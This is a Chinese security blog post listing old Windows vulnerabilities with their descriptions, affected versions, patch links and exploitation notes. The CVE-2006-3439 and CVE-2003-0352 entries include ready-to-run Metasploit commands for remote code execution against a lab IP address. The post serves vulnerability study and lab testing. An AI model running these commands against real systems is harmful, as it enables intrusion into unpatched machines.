辅助功能驱动程序(AFD)组件中的afd.sys无法正确验证从用户模式发送到内核的输入,这允许本地用户通过精心设计的应用程序获取特权 ,如使用精心设计的指针和长度所说明的那样,这些指针和长度绕过了预期的ProbeForRead和ProbeForWrite限制。

影响版本

Product Version Update Edition Tested
Windows 2003 Server
SP2

Windows 2003 Server
SP2 Itanium
Windows 2003 Server
SP2 X64
Windows 2003 Server

X64
Windows 2003 Server
SP1 Itanium
Windows 2003 Server Professional SP3

Windows Xp
SP2 Professional X64
Windows Xp
SP3

Windows Xp

Professional X64
Windows Xp
SP2

修复补丁

https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2008-3464

利用方式

只找到可执行exe文件,测试系统windows server 2003 sp2 x86

CVE-2008-3464_win2003_x86.gif


CVE-2008-1084

描述

内核中未指定的漏洞允许本地用户通过与错误输入验证有关的未知向量执行任意代码。

影响版本

Product Version Update Edition Tested
Windows 2000
SP4

Windows 2003 Server
SP2 X64
Windows 2003 Server

X64
Windows 2003 Server
SP1

Windows 2003 Server
SP1 Itanium
Windows 2003 Server
SP2

Windows 2003 Server
SP2 Itanium
Windows Server 2008 -


Windows Vista

X64
Windows Vista
SP1

Windows Vista
SP1 X64
Windows Xp
SP2

Windows Xp
SP2 X64
Windows Xp

X64

修复补丁

https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2008-1084

利用方式

测试系统windows server 2003 sp2 x86

CVE-2008-1084_win2003_x86.gif

CVE-2006-3439

描述

服务器服务中的缓冲区溢出允许包括匿名用户在内的远程攻击者通过精心制作的RPC消息执行任意代码

影响版本

Product Version Update Edition Tested
Windows 2000
SP4

Windows 2003 Server R2


Windows 2003 Server SP1


Windows 2003 Server SP1
Itanium
Windows 2003 Server 64-bit


Windows 2003 Server Itanium


Windows Xp
SP1 Tablet Pc
Windows Xp
SP2 Tablet Pc
Windows Xp

64-bit

修复补丁

https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2006-3439

利用方式

msf 利用 测试系统windows server 2000 sp4 x86

use exploit/windows/smb/ms06_040_netapi
set RHOST 192.168.1.17
run

CVE-2005-1983

描述

PnP服务中基于堆栈的缓冲区溢出使远程攻击者可以通过精心制作的数据包执行任意代码,而本地用户可以通过恶意应用程序获取特权, Zotob(又名Mytob)蠕虫。

影响版本

Product Version Update Edition Tested
Windows 2000



Windows Xp
SP1 Tablet Pc

修复补丁

https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2005-1983

利用方式

暂无

CVE-2003-0352

描述

某些RPC的DCOM接口中的缓冲区溢出使远程攻击者可以通过格式错误的消息执行任意代码

影响版本

Product Version Update Edition Tested
Windows 2000



Windows 2000
SP1

Windows 2000
SP2

Windows 2000
SP3

Windows 2000
SP4

Windows 2003 Server R2
64-bit
Windows 2003 Server R2
Datacenter 64-bit
Windows 2003 Server WEB


Windows 2003 Server Enterprise
64-bit
Windows 2003 Server Enterprise 64-bit


Windows 2003 Server Standard
64-bit
Windows Nt 4.0 SP1 Server
Windows Nt 4.0 SP5 Server
Windows Nt 4.0 SP4 Enterprise Server
Windows Nt 4.0
Enterprise Server
Windows Nt 4.0 SP6 Workstation
Windows Nt 4.0 SP2 Workstation
Windows Nt 4.0 SP1 Terminal Server
Windows Nt 4.0 SP5 Terminal Server
Windows Nt 4.0 SP4 Server
Windows Nt 4.0
Server
Windows Nt 4.0 Sp6a Enterprise Server
Windows Nt 4.0 SP3 Enterprise Server
Windows Nt 4.0 SP5 Workstation
Windows Nt 4.0 SP1 Workstation
Windows Nt 4.0 SP4 Terminal Server
Windows Nt 4.0
Terminal Server
Windows Nt 4.0 Sp6a Server
Windows Nt 4.0 SP3 Server
Windows Nt 4.0 SP6 Enterprise Server
Windows Nt 4.0 SP2 Enterprise Server
Windows Nt 4.0 SP4 Workstation
Windows Nt 4.0
Workstation
Windows Nt 4.0 Sp6a Terminal Server
Windows Nt 4.0 SP3 Terminal Server
Windows Nt 4.0 SP6 Server
Windows Nt 4.0 SP2 Server
Windows Nt 4.0 SP1 Enterprise Server
Windows Nt 4.0 SP5 Enterprise Server
Windows Nt 4.0 Sp6a Workstation
Windows Nt 4.0 SP3 Workstation
Windows Nt 4.0 SP6 Terminal Server
Windows Nt 4.0 SP2 Terminal Server
Windows Xp

64-bit
Windows Xp

Home
Windows Xp
Gold Professional
Windows Xp
SP1 64-bit
Windows Xp
SP1 Home

修复补丁

https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2003-0352

利用方式

测试系统windows 2000 sp4 x86

use exploit/windows/dcerpc/ms03_026_dcom
set RHOST 192.168.1.17
run

CVE-2003-0352_win2000_x86_msf.png

查看系统信息

CVE-2003-0352_win2000_x86_msf2.png


本文作者:ascotbe

本文为安全脉搏专栏作者发布,转载请注明:https://www.secpulse.com/archives/144478.html

Tags:
评论  (0)
快来写下你的想法吧!

ascotbe

文章数:12 积分: 190

安全问答社区

安全问答社区

脉搏官方公众号

脉搏公众号